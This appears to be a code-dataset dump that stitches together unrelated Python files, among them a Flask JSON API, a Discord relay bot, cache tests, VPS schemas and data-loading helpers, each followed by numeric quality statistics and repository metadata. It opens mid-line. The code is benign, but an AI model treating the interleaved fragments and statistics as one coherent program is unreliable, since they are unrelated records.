os.path.exists(os.path.join(path, filename)): url = 'http://dustintran.com/data/r/DAAG/bomsoi.csv' maybe_download_and_extract(path, url, save_file_name='bomsoi.csv', resume=False) data = pd.read_csv(os.path.join(path, filename), index_col=0, parse_dates=True) x_train = data.values metadata = {'columns': data.columns} return x_train, metadata
22.942149
74
0.699207
390
2,776
4.905128
0.484615
0.06116
0.075274
0.100366
0.198641
0.023001
0
0
0
0
0
0.01013
0.253242
2,776
120
75
23.133333
0.912687
0.67255
0
0
0
0
0.09126
0
0
0
0
0
0
1
0.045455
false
0
0.409091
0
0.5
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
9118ae0e8ce4a6964c33407d1f9bb269a5f81229
948
py
Python
openpype/hosts/houdini/plugins/publish/validate_bypass.py
dangerstudios/OpenPype
10ddcc4699137888616eec57cd7fac9648189714
[ "MIT" ]
null
null
null
openpype/hosts/houdini/plugins/publish/validate_bypass.py
dangerstudios/OpenPype
10ddcc4699137888616eec57cd7fac9648189714
[ "MIT" ]
null
null
null
openpype/hosts/houdini/plugins/publish/validate_bypass.py
dangerstudios/OpenPype
10ddcc4699137888616eec57cd7fac9648189714
[ "MIT" ]
null
null
null
import pyblish.api import openpype.api class ValidateBypassed(pyblish.api.InstancePlugin): """Validate all primitives build hierarchy from attribute when enabled. The name of the attribute must exist on the prims and have the same name as Build Hierarchy from Attribute's `Path Attribute` value on the Alembic ROP node whenever Build Hierarchy from Attribute is enabled. """ order = openpype.api.ValidateContentsOrder - 0.1 families = ["*"] hosts = ["houdini"] label = "Validate ROP Bypass" def process(self, instance): invalid = self.get_invalid(instance) if invalid: rop = invalid[0] raise RuntimeError( "ROP node %s is set to bypass, publishing cannot continue.." % rop.path() ) @classmethod def get_invalid(cls, instance): rop = instance[0] if rop.isBypassed(): return [rop]
27.085714
78
0.632911
111
948
5.387387
0.558559
0.070234
0.090301
0.135452
0
0
0
0
0
0
0
0.005926
0.287975
948
34
79
27.882353
0.88
0.292194
0
0
0
0
0.131376
0
0
0
0
0
0
1
0.1
false
0.2
0.1
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
9119b7e105152a68ddb6c7704cd3d58179e633e6
4,687
py
Python
gavPrj/dataset_core.py
GavinK-ai/cv
6dd11b2100c40aca281508c3821c807ef0ee227d
[ "MIT" ]
1
2021-11-15T06:16:44.000Z
2021-11-15T06:16:44.000Z
gavPrj/dataset_core.py
JKai96/cv
6dd11b2100c40aca281508c3821c807ef0ee227d
[ "MIT" ]
null
null
null
gavPrj/dataset_core.py
JKai96/cv
6dd11b2100c40aca281508c3821c807ef0ee227d
[ "MIT" ]
null
null
null
import os import cv2 as cv import matplotlib.pyplot as plt import numpy as np #srcPaths = ('dataset/Screenshot1','dataset/Screenshot2','dataset/Screenshot3', 'dataset/Screenshot4') #srcPaths = ('all_dataset/s1', # 'all_dataset/s10', # 'all_dataset/s11', # 'all_dataset/s12', # 'all_dataset/s13', # 'all_dataset/s14', # 'all_dataset/s15', # 'all_dataset/s16', # 'all_dataset/s17', # 'all_dataset/s18', # 'all_dataset/s19', # 'all_dataset/s2', # 'all_dataset/s20', # 'all_dataset/s21', # 'all_dataset/s22', # 'all_dataset/s23', # 'all_dataset/s24', # 'all_dataset/s25', # 'all_dataset/s26', # 'all_dataset/s27', # 'all_dataset/s28', # 'all_dataset/s29', # 'all_dataset/s3', # 'all_dataset/s30', # 'all_dataset/s31', # 'all_dataset/s32', # 'all_dataset/s33', # 'all_dataset/s34', # 'all_dataset/s35', # 'all_dataset/s36', # 'all_dataset/s37', # 'all_dataset/s38', # 'all_dataset/s39', # 'all_dataset/s4', # 'all_dataset/s40', # 'all_dataset/s41', # 'all_dataset/s42', # 'all_dataset/s43', # 'all_dataset/s44', # 'all_dataset/s45', # 'all_dataset/s46', # 'all_dataset/s47', # 'all_dataset/s48', # 'all_dataset/s49', # 'all_dataset/s5', # 'all_dataset/s50', # 'all_dataset/s51', # 'all_dataset/s52', # 'all_dataset/s53', # 'all_dataset/s54', # 'all_dataset/s55', # 'all_dataset/s56', # 'all_dataset/s57', # 'all_dataset/s58', # 'all_dataset/s59', # 'all_dataset/s6', # 'all_dataset/s60', # 'all_dataset/s61', # 'all_dataset/s62', # 'all_dataset/s63', # 'all_dataset/s7', # 'all_dataset/s8', # 'all_dataset/s9') srcPaths = ('testdataset/t1','testdataset/t2') datasetfilename = 'testdataset1.npz' def create_dataset(datasetfilename, srcPaths, classNames): imgList = [] labelList = [] labelNameList = [] for srcPath in srcPaths: # append all files in srcPath dir into imgList and labelList for fname in os.listdir(srcPath): filePath = os.path.join(srcPath, fname) img = cv.imread(filePath) # spilt the last text in file name to save as label fname_no_ext = os.path.splitext(fname)[0] # label = fname_no_ext[-1] label = fname_no_ext imgList.append(img) labelList.append(classNames[label]) labelNameList.append(label) # convert to imgList to numpy images = np.array(imgList, dtype='object') labels = np.array(labelList, dtype='object') labelnames = np.array(labelNameList) # save converted images and labels into compressed numpy zip file np.savez_compressed(datasetfilename, images=images, labels=labels, labelnames=labelnames) return True def displayImg(): # for fname in os.listdir(srcPath): pass if __name__ == '__main__': # save a dataset in numpy compressed format # datasetfilename = 'tiredataset.npz' classNames = {'afiq':0, 'azureen':1, 'gavin':2, 'goke':3, 'inamul':4, 'jincheng':5, 'mahmuda':6, 'numan':7, 'saseendran':8} if create_dataset(datasetfilename, srcPaths, classNames): data = np.load(datasetfilename, allow_pickle=True) imgList = data['images'] labelList = data['labels'] labelNameList = data['labelnames'] img = imgList[0] label = labelList[0] labelNameList = data['labelnames'] imgRGB = img[:, :, ::-1] plt.imshow(imgRGB) plt.title(label) plt.show() print(imgList.shape) print(labelList.shape) # imgList, labelList = create_dataset() # img = imgList[0] # label = labelList[0] # imgRGB = img[:, :, ::-1] # plt.imshow(imgRGB) # plt.title(label) # plt.show() # img = imgList[1] # label = labelList[1] # imgRGB = img[:, :, ::-1] # plt.imshow(imgRGB) # plt.title(label) # plt.show() # img = imgList[3] # label = labelList[3] # imgRGB = img[:, :, ::-1] # plt.imshow(imgRGB) # plt.title(label) # plt.show()
26.331461
128
0.528056
486
4,687
4.923868
0.343621
0.263268
0.016715
0.02173
0.165483
0.127037
0.083577
0.083577
0.083577
0.083577
0
0.047299
0.332409
4,687
177
129
26.480226
0.717482
0.427992
0
0.047619
0
0
0.058687
0
0
0
0
0
0
1
0.047619
false
0.02381
0.095238
0
0.166667
0.047619
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
9127b9612983c8643c1eb5911a7a12880ad76607
803
py
Python
web13/jsonapi.py
gongjunhuang/web
9412f6fd7c223174fdb30f4d7a8b61a8e130e329
[ "Apache-2.0" ]
null
null
null
web13/jsonapi.py
gongjunhuang/web
9412f6fd7c223174fdb30f4d7a8b61a8e130e329
[ "Apache-2.0" ]
null
null
null
web13/jsonapi.py
gongjunhuang/web
9412f6fd7c223174fdb30f4d7a8b61a8e130e329
[ "Apache-2.0" ]
null
null
null
from flask import Flask, redirect, url_for, jsonify, request app = Flask(__name__) users = [] ''' Json api 请求form里面Json 返回Json 好处: 1.通信的格式统一,对语言的约束就小了 2.易于做成open api 3.客户端重度渲染 RESTful api Dr. Fielding url 用资源来组织的 名词 /GET /players 拿到所有玩家 /GET /player/id 访问id的玩家的数据 /PUT /players 全量更新 /PATCH /players 部分更新 /DELETE /player/id 删除一个玩家 /GET /player/id/level ''' @app.route("/", methods=["GET"]) def index(): return'''<form method=post action='/add'> <input type=text name=author> <button>提交</button> </form> ''' @app.route("/add", methods=["POST"]) def add(): form = request.form users.append(dict(author=form.get("author", ""))) return redirect(url_for(".index")) @app.route("/json") def json(): return jsonify(users) app.run()
16.387755
60
0.636364
107
803
4.719626
0.560748
0.047525
0.055446
0
0
0
0
0
0
0
0
0.004658
0.198007
803
49
61
16.387755
0.779503
0
0
0
0
0
0.268245
0
0
0
0
0
0
1
0.157895
false
0
0.052632
0.105263
0.315789
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
912a168bff4536c4b4657348252f51f09a3dbc8c
1,776
py
Python
MoMMI/Modules/ss14_nudges.py
T6751/MoMMI
4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a
[ "MIT" ]
18
2016-08-06T17:31:59.000Z
2021-12-24T13:08:02.000Z
MoMMI/Modules/ss14_nudges.py
T6751/MoMMI
4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a
[ "MIT" ]
29
2016-08-07T14:03:00.000Z
2022-01-23T21:05:33.000Z
MoMMI/Modules/ss14_nudges.py
T6751/MoMMI
4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a
[ "MIT" ]
25
2016-08-08T12:56:02.000Z
2022-02-09T07:17:51.000Z
import logging from typing import Match, Any, Dict import aiohttp from discord import Message from MoMMI import comm_event, command, MChannel, always_command logger = logging.getLogger(__name__) @comm_event("ss14") async def ss14_nudge(channel: MChannel, message: Any, meta: str) -> None: try: config: Dict[str, Any] = channel.module_config(f"ss14.servers.{meta}") except ValueError: return expect_password = config["password"] if expect_password != message.get("password"): return if "type" not in message or "contents" not in message: return contents = message["contents"] type = message["type"] if type == "ooc": final_message = f"\u200B**OOC**: `{contents['sender']}`: {contents['contents']}" else: return await channel.send(final_message) @always_command("ss14_relay", unsafe=True) async def ss14_relay(channel: MChannel, match: Match, message: Message) -> None: if not channel.internal_name: return content = message.content content = content.strip() if not content or content[0] == "\u200B": return server = None config: Any for config in channel.server_config("modules.ss14", []): if config["discord_channel"] != channel.internal_name: continue server = config["server"] if not server: return config = channel.module_config(f"ss14.servers.{server}") password = config["password"] url = config["api_url"] + "/ooc" async with aiohttp.ClientSession() as session: async with session.post(url, json={"password": password, "sender": message.author.name, "contents": content}) as resp: r = await resp.text() logger.error(f"{resp.status}")
27.75
126
0.649212
214
1,776
5.285047
0.35514
0.013263
0.02122
0.035367
0.054819
0.054819
0
0
0
0
0
0.015284
0.226351
1,776
63
127
28.190476
0.80786
0
0
0.148936
0
0
0.141329
0.037162
0
0
0
0
0
1
0
false
0.085106
0.106383
0
0.255319
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
912c1f2c9b394208b14b4781f1f67d739e19f340
539
py
Python
spoon/models/groupmembership.py
mikeboers/Spoon
9fe4a06be7c2c6c307b79e72893e32f2006de4ea
[ "BSD-3-Clause" ]
4
2017-11-05T02:54:39.000Z
2022-03-01T06:01:20.000Z
spoon/models/groupmembership.py
mikeboers/Spoon
9fe4a06be7c2c6c307b79e72893e32f2006de4ea
[ "BSD-3-Clause" ]
null
null
null
spoon/models/groupmembership.py
mikeboers/Spoon
9fe4a06be7c2c6c307b79e72893e32f2006de4ea
[ "BSD-3-Clause" ]
null
null
null
import sqlalchemy as sa from ..core import db class GroupMembership(db.Model): __tablename__ = 'group_memberships' __table_args__ = dict( autoload=True, extend_existing=True, ) user = db.relationship('Account', foreign_keys='GroupMembership.user_id', backref=db.backref('groups', cascade="all, delete-orphan"), ) group = db.relationship('Account', foreign_keys='GroupMembership.group_id', backref=db.backref('members', cascade="all, delete-orphan"), )
22.458333
68
0.651206
57
539
5.894737
0.578947
0.083333
0.125
0.166667
0.279762
0.279762
0
0
0
0
0
0
0.226345
539
23
69
23.434783
0.805755
0
0
0
0
0
0.236059
0.087361
0
0
0
0
0
1
0
false
0
0.125
0
0.4375
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
912dd1c1fee777c8a3a588b4ebb22c1cb4588df4
1,790
py
Python
data/cache/test/test_cache.py
dongboyan77/quay
8018e5bd80f17e6d855b58b7d5f2792d92675905
[ "Apache-2.0" ]
1
2020-10-16T19:30:41.000Z
2020-10-16T19:30:41.000Z
data/cache/test/test_cache.py
dongboyan77/quay
8018e5bd80f17e6d855b58b7d5f2792d92675905
[ "Apache-2.0" ]
15
2020-06-18T15:32:06.000Z
2022-03-03T23:06:24.000Z
data/cache/test/test_cache.py
dongboyan77/quay
8018e5bd80f17e6d855b58b7d5f2792d92675905
[ "Apache-2.0" ]
null
null
null
import pytest from mock import patch from data.cache import InMemoryDataModelCache, NoopDataModelCache, MemcachedModelCache from data.cache.cache_key import CacheKey class MockClient(object): def __init__(self, server, **kwargs): self.data = {} def get(self, key, default=None): return self.data.get(key, default) def set(self, key, value, expire=None): self.data[key] = value @pytest.mark.parametrize("cache_type", [(NoopDataModelCache), (InMemoryDataModelCache),]) def test_caching(cache_type): key = CacheKey("foo", "60m") cache = cache_type() # Perform two retrievals, and make sure both return. assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234} assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234} def test_memcache(): key = CacheKey("foo", "60m") with patch("data.cache.impl.Client", MockClient): cache = MemcachedModelCache(("127.0.0.1", "-1")) assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234} assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234} def test_memcache_should_cache(): key = CacheKey("foo", None) def sc(value): return value["a"] != 1234 with patch("data.cache.impl.Client", MockClient): cache = MemcachedModelCache(("127.0.0.1", "-1")) assert cache.retrieve(key, lambda: {"a": 1234}, should_cache=sc) == {"a": 1234} # Ensure not cached since it was `1234`. assert cache._get_client().get(key.key) is None # Ensure cached. assert cache.retrieve(key, lambda: {"a": 2345}, should_cache=sc) == {"a": 2345} assert cache._get_client().get(key.key) is not None assert cache.retrieve(key, lambda: {"a": 2345}, should_cache=sc) == {"a": 2345}
32.545455
89
0.634078
231
1,790
4.82684
0.272727
0.049327
0.119283
0.138117
0.463677
0.463677
0.463677
0.463677
0.408072
0.408072
0
0.057383
0.201676
1,790
54
90
33.148148
0.722883
0.058101
0
0.352941
0
0
0.06302
0.026159
0
0
0
0
0.264706
1
0.205882
false
0
0.117647
0.058824
0.411765
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
9136160d5624a0c97151f5a92ef4449fe0be2b28
1,951
py
Python
ArraysP2.py
EdgarVallejo96/pyEdureka
f103f67ed4f9eee6ab924237e9d94a489e602c7c
[ "MIT" ]
null
null
null
ArraysP2.py
EdgarVallejo96/pyEdureka
f103f67ed4f9eee6ab924237e9d94a489e602c7c
[ "MIT" ]
null
null
null
ArraysP2.py
EdgarVallejo96/pyEdureka
f103f67ed4f9eee6ab924237e9d94a489e602c7c
[ "MIT" ]
null
null
null
import array as arr a = arr.array('i', [ 1,2,3,4,5,6]) print(a) # Accessing elements print(a[2]) print(a[-2]) # BASIC ARRAY OPERATIONS # Find length of array print() print('Length of array') print(len(a)) # Adding elments to an array # append() to add a single element at the end of an array # extend() to add more than one element at the end of an array # insert() to add an element at a specific position in an array print() # append print('Append') a.append(8) print(a) # extend print() print('Extend') a.extend([9,8,6,5,4]) print(a) # insert print() print('Insert') a.insert(2,6) # first param is the index, second param is the value print(a) # Removing elements from an array # pop() Remove an element and return it # remove() Remove element with a specific value without returning it print() print(a) # pop print('pop') print(a.pop()) # removes last element print(a) print(a.pop(2)) print(a) print(a.pop(-1)) print(a) # remove print() print('remove') print(a.remove(8)) # doesn't return what it removes, it removed the first occurrence of '8' print(a) # Array Concatenation print() print('Array Concatenation') b = arr.array('i', [1,2,3,4,5,6,7]) c = arr.array('i', [3,4,2,1,3,5,6,7,8]) d = arr.array('i') d = b + c print(d) # Slicing an Array print() print('Slicing an Array') # This means fetching some particular values from an array print(d) print(d[0:5]) # Doesn't include the value on the right index print(d[0:-2]) print(d[::-1]) # Reverse the array, this method is not preferred because it exauhsts the memory # Looping through an Array print() print('Looping through an Array') print('Using for') for x in d: print(x, end=' ') print() for x in d[0:-3]: print(x, end=' ') print() print('Using while') temp = 0 while temp < d[2]: print(d[temp], end = ' ') temp = temp + 1 # Can use temp+=1, it's the same thing print() print(a) tem = 0 while tem < len(a): print(a[tem], end=' ') tem += 1 print()
18.759615
95
0.664787
357
1,951
3.633053
0.282913
0.078643
0.046261
0.01542
0.123362
0.060139
0.060139
0.02313
0.02313
0
0
0.030492
0.17632
1,951
103
96
18.941748
0.776602
0.441312
0
0.402985
0
0
0.121583
0
0
0
0
0
0
1
0
false
0
0.014925
0
0.014925
0.746269
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
913e527c83f21ed4118adbad50f5935916d3a9fa
2,221
py
Python
src/backend/schemas/vps.py
ddddhm1/LuWu
f9feaf10a6aca0dd31f250741a1c542ee5256633
[ "Apache-2.0" ]
658
2019-04-29T02:46:02.000Z
2022-03-30T03:58:42.000Z
src/backend/schemas/vps.py
ddddhm1/LuWu
f9feaf10a6aca0dd31f250741a1c542ee5256633
[ "Apache-2.0" ]
9
2020-06-04T13:38:58.000Z
2022-02-27T21:23:29.000Z
src/backend/schemas/vps.py
ddddhm1/LuWu
f9feaf10a6aca0dd31f250741a1c542ee5256633
[ "Apache-2.0" ]
130
2019-05-02T23:42:58.000Z
2022-03-24T04:35:37.000Z
from typing import List from typing import Optional from typing import Union from models.vps import VpsStatus from schemas.base import APIModel from schemas.base import BasePagination from schemas.base import BaseSchema from schemas.base import BaseSuccessfulResponseModel class VpsSshKeySchema(APIModel): name: str public_key: str = None private_key: str = None isp_id: int ssh_key_id: Optional[str] date_created: Optional[str] fingerprint: Optional[str] class VpsSpecPlanSchema(APIModel): name: str plan_code: Union[str, int] region_codes: List = None bandwidth: float ram: int vcpu: int disk: int price_monthly: Union[float, int, str] = None price_hourly: Union[float, int, str] = None price_yearly: Union[float, int, str] = None class VpsSpecRegionSchema(APIModel): name: str region_code: Union[str, int] features: List[str] = None plan_codes: List[Union[str, int]] = [] class VpsSpecOsSchema(APIModel): name: str os_code: Union[str, int] region_codes: List[Union[str, int]] = [] plan_codes: List[Union[str, int]] = [] class VpsSpecSchema(APIModel): region: List[VpsSpecRegionSchema] = [] plan: List[VpsSpecPlanSchema] = [] os: List[VpsSpecOsSchema] = [] class VpsSpecResponse(BaseSuccessfulResponseModel): result: VpsSpecSchema class VpsCreateSchema(APIModel): hostname: str isp_id: int region_code: str os_code: str plan_code: str ssh_keys: List[str] = [] status: int = VpsStatus.init remark: str = None class VpsItemSchema(BaseSchema): isp_id: int ip: Union[int, str, None] server_id: Optional[str] hostname: str os: Optional[str] plan: Optional[str] region: Optional[str] status: int status_name: str status_msg: Optional[str] isp_provider_name: str class VpsItemResponse(BaseSuccessfulResponseModel): result: VpsItemSchema class VpsPaginationSchema(BasePagination): items: Optional[List[VpsItemSchema]] class VpsPaginationResponse(BaseSuccessfulResponseModel): result: VpsPaginationSchema class VpsSshKeyResponseSchema(BaseSuccessfulResponseModel): result: List[VpsSshKeySchema]
22.663265
59
0.714093
257
2,221
6.066148
0.2607
0.03592
0.042335
0.053881
0.127646
0.107761
0.07569
0
0
0
0
0
0.197659
2,221
97
60
22.896907
0.87486
0
0
0.152778
0
0
0
0
0
0
0
0
0
1
0
true
0
0.111111
0
1
0.013889
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
913effe79b3a41e71c6774354a20673cc5bf2cf7
672
py
Python
main.py
hari-sh/sigplot
cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81
[ "MIT" ]
null
null
null
main.py
hari-sh/sigplot
cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81
[ "MIT" ]
null
null
null
main.py
hari-sh/sigplot
cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81
[ "MIT" ]
null
null
null
import sigplot as sp import matplotlib import matplotlib.pyplot as plt import numpy as np matplotlib.rcParams['toolbar'] = 'None' plt.style.use('dark_background') fig = plt.figure() # seed = np.linspace(3, 7, 1000) # a = (np.sin(2 * np.pi * seed)) # b = (np.cos(2 * np.pi * seed)) # sp.correlate(fig, b, a, 300) t = np.linspace(0, 1, 500) b = (np.cos(2 * np.pi * t)) # x = np.concatenate([np.zeros(500), signal.sawtooth(2 * np.pi * 5 * t), np.zeros(500), np.ones(120), np.zeros(500)]) x = np.concatenate([np.zeros(500), np.ones(500), np.zeros(500)]) sp.fourier_series(fig, x, 100, 200, 200) plt.show() # WriteToVideo("twoPulse.mp4", anim);
25.846154
118
0.623512
114
672
3.657895
0.45614
0.083933
0.119904
0.043165
0.220624
0.167866
0
0
0
0
0
0.09058
0.178571
672
25
119
26.88
0.664855
0.40625
0
0
0
0
0.070845
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
9143b8c633adb2c76477406a889fd2a426c5cda8
278
py
Python
gigamonkeys/get.py
gigamonkey/sheets
a89e76360ad9a35e44e5e352346eeccbe6952b1f
[ "BSD-3-Clause" ]
null
null
null
gigamonkeys/get.py
gigamonkey/sheets
a89e76360ad9a35e44e5e352346eeccbe6952b1f
[ "BSD-3-Clause" ]
1
2021-04-03T23:07:35.000Z
2021-04-03T23:07:35.000Z
gigamonkeys/get.py
gigamonkey/sheets
a89e76360ad9a35e44e5e352346eeccbe6952b1f
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/env python import json import sys from gigamonkeys.spreadsheets import spreadsheets spreadsheet_id = sys.argv[1] ranges = sys.argv[2:] data = spreadsheets().get(spreadsheet_id, include_grid_data=bool(ranges), ranges=ranges) json.dump(data, sys.stdout, indent=2)
19.857143
88
0.773381
41
278
5.146341
0.585366
0.123223
0
0
0
0
0
0
0
0
0
0.012048
0.104317
278
13
89
21.384615
0.835341
0.071942
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.428571
0
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
9146c7949d8b05d057e0f629fb324a047f0358c0
6,145
py
Python
sources/wrappers.py
X-rayLaser/keras-auto-hwr
67cfc0209045b1e211f0491b0199cb9d6811bfd0
[ "MIT" ]
null
null
null
sources/wrappers.py
X-rayLaser/keras-auto-hwr
67cfc0209045b1e211f0491b0199cb9d6811bfd0
[ "MIT" ]
2
2020-01-04T09:03:31.000Z
2021-05-10T18:29:41.000Z
sources/wrappers.py
X-rayLaser/keras-auto-hwr
67cfc0209045b1e211f0491b0199cb9d6811bfd0
[ "MIT" ]
null
null
null
import numpy as np from sources import BaseSource from sources.base import BaseSourceWrapper from sources.preloaded import PreLoadedSource import json class WordsSource(BaseSource): def __init__(self, source): self._source = source def __len__(self): return len(self._source) def _remove_apostrpohs(self, seq): res = ''.join(seq.split('&apos;')) res = ''.join(res.split('&quot;')) return res def _clean(self, seq): s = '' for ch in seq.strip(): if ch.isalpha(): s += ch return s def get_sequences(self): for seq_in, transcription in self._source.get_sequences(): transcription = self._remove_apostrpohs(transcription) words = [self._clean(word) for word in transcription.split(' ')] yield seq_in, words class LabelSource(BaseSource): def __init__(self, source, mapping_table): self._source = source self._mapping_table = mapping_table def __len__(self): return len(self._source) def get_sequences(self): for seq_in, seq_out in self._source.get_sequences(): label_seq = [self._mapping_table.encode(ch) for ch in seq_out] yield seq_in, label_seq class CTCAdaptedSource(BaseSource): def __init__(self, source, padding_value=0): self._source = source self._padding = padding_value def __len__(self): return len(self._source) def get_sequences(self): for seq_in, seq_out in self._source.get_sequences(): seqs_in_pad = list(seq_in) while len(seqs_in_pad) <= 2 * len(seq_out) + 1: n = len(seqs_in_pad[0]) seqs_in_pad.append([self._padding] * n) yield seqs_in_pad, seq_out class Normalizer: def __init__(self): self._mu = None self._sd = None @staticmethod def from_json(path): with open(path, 'r') as f: s = f.read() d = json.loads(s) normalizer = Normalizer() mu = np.array(d['mu']) sd = np.array(d['sd']) normalizer.set_mean(mu) normalizer.set_deviation(sd) return normalizer def to_json(self, path): d = { 'mu': np.array(self.mu).tolist(), 'sd': np.array(self.sd).tolist() } with open(path, 'w') as f: f.write(json.dumps(d)) def set_mean(self, mu): self._mu = mu def set_deviation(self, sd): self._sd = sd @property def mu(self): return self._mu @property def sd(self): return self._sd def fit(self, X): sequence = [] for x in X: sequence.extend(x) self._mu = np.mean(sequence, axis=0) self._sd = np.std(sequence, axis=0) def preprocess(self, X): res = [] for x in X: x_norm = (x - self._mu) / self._sd # we do not want to normalize END-OF-STROKE flag which is last in the tuple x_norm[:, -1] = np.array(x)[:, -1] res.append(x_norm.tolist()) return res class OffsetPointsSource(BaseSource): def __init__(self, source): self._source = source def __len__(self): return len(self._source) def get_sequences(self): for strokes, transcription in self._source.get_sequences(): x0, y0, t0 = strokes[0].points[0] new_seq = [] for stroke in strokes: points = [] for x, y, t in stroke.points: points.append((x - x0, y - y0, t - t0, 0)) points[-1] = points[-1][:-1] + (1,) new_seq.extend(points) yield new_seq, transcription class NormalizedSource(BaseSource): def __init__(self, source, normalizer): self._source = source self._normalizer = normalizer def __len__(self): return len(self._source) def get_sequences(self): for points, transcription in self._source.get_sequences(): norm = self._normalizer.preprocess([points])[0] yield norm, transcription class DenormalizedSource(BaseSource): def __init__(self, source, normalizer): self._source = source self._normalizer = normalizer def __len__(self): return len(self._source) def get_sequences(self): mu = self._normalizer.mu sd = self._normalizer.sd for points, transcription in self._source.get_sequences(): denormalized = [(p * sd + mu).tolist() for p in points] for i, p in enumerate(denormalized): p[3] = points[i][3] yield denormalized, transcription class H5pySource(BaseSource): def __init__(self, h5py_ds, random_order=True): self._h5py = h5py_ds self._random = random_order def __len__(self): return len(self._h5py) def get_sequences(self): return self._h5py.get_data(random_order=self._random) class PreprocessedSource(BaseSourceWrapper): def __init__(self, source, preprocessor): super().__init__(source) self._preprocessor = preprocessor def get_sequences(self): for xs, ys in self._source.get_sequences(): yield self._preprocessor.pre_process_example(xs, ys) class ConstrainedSource(BaseSourceWrapper): def __init__(self, source, num_lines): super().__init__(source) self._num_lines = num_lines self._use_all = (num_lines == 0) def get_sequences(self): for j, (seq_in, seq_out) in enumerate(self._source.get_sequences()): #print(j, seq_out) if j % 500 == 0: print('Fetched {} examples'.format(j)) if j >= self._num_lines and not self._use_all: break yield seq_in, seq_out class PlainListSource(BaseSourceWrapper): def get_sequences(self): for strokes, t in self._source.get_sequences(): points = [stroke.points for stroke in strokes] yield points, t
26.038136
87
0.588771
757
6,145
4.498018
0.198151
0.085169
0.032305
0.0558
0.314244
0.247577
0.208517
0.200587
0.174449
0.174449
0
0.008201
0.305452
6,145
235
88
26.148936
0.789597
0.014646
0
0.284848
0
0
0.00694
0
0
0
0
0
0
1
0.224242
false
0
0.030303
0.060606
0.406061
0.006061
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
914899652debcd6bf278b6bcd59488d3ca01a934
349
py
Python
lang_detect_gears.py
AlexMikhalev/cord19redisknowledgegraph
a143415aca8d4a6db820dc7a25280045f421a665
[ "Apache-2.0" ]
7
2020-05-18T09:25:17.000Z
2021-08-05T00:23:36.000Z
lang_detect_gears.py
maraqa1/CORD-19
a473f7b60b8dfa476ea46505678481e4b361d04e
[ "Apache-2.0" ]
10
2020-05-31T14:44:26.000Z
2022-03-25T19:17:37.000Z
lang_detect_gears.py
maraqa1/CORD-19
a473f7b60b8dfa476ea46505678481e4b361d04e
[ "Apache-2.0" ]
null
null
null
from langdetect import detect def detect_language(x): #detect language of the article try: lang=detect(x['value']) except: lang="empty" execute('SET', 'lang_article:' + x['key'], lang) if lang!='en': execute('SADD','titles_to_delete', x['key']) gb = GB() gb.foreach(detect_language) gb.run('title:*')
23.266667
52
0.60745
47
349
4.404255
0.595745
0.202899
0
0
0
0
0
0
0
0
0
0
0.22063
349
15
53
23.266667
0.761029
0.08596
0
0
0
0
0.191223
0
0
0
0
0
0
1
0.083333
false
0
0.083333
0
0.166667
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
914cca42f7c78c12fb45153e185381ce97dc5240
5,200
py
Python
seismic/checkpointing/checkpoint.py
slimgroup/Devito-Examples
449e1286a18ebc4172069372ba2bf3cd2ec99a2f
[ "MIT" ]
7
2020-08-19T18:23:08.000Z
2022-02-18T19:19:24.000Z
seismic/checkpointing/checkpoint.py
slimgroup/Devito-Examples
449e1286a18ebc4172069372ba2bf3cd2ec99a2f
[ "MIT" ]
null
null
null
seismic/checkpointing/checkpoint.py
slimgroup/Devito-Examples
449e1286a18ebc4172069372ba2bf3cd2ec99a2f
[ "MIT" ]
3
2020-12-01T22:17:09.000Z
2021-05-21T11:29:07.000Z
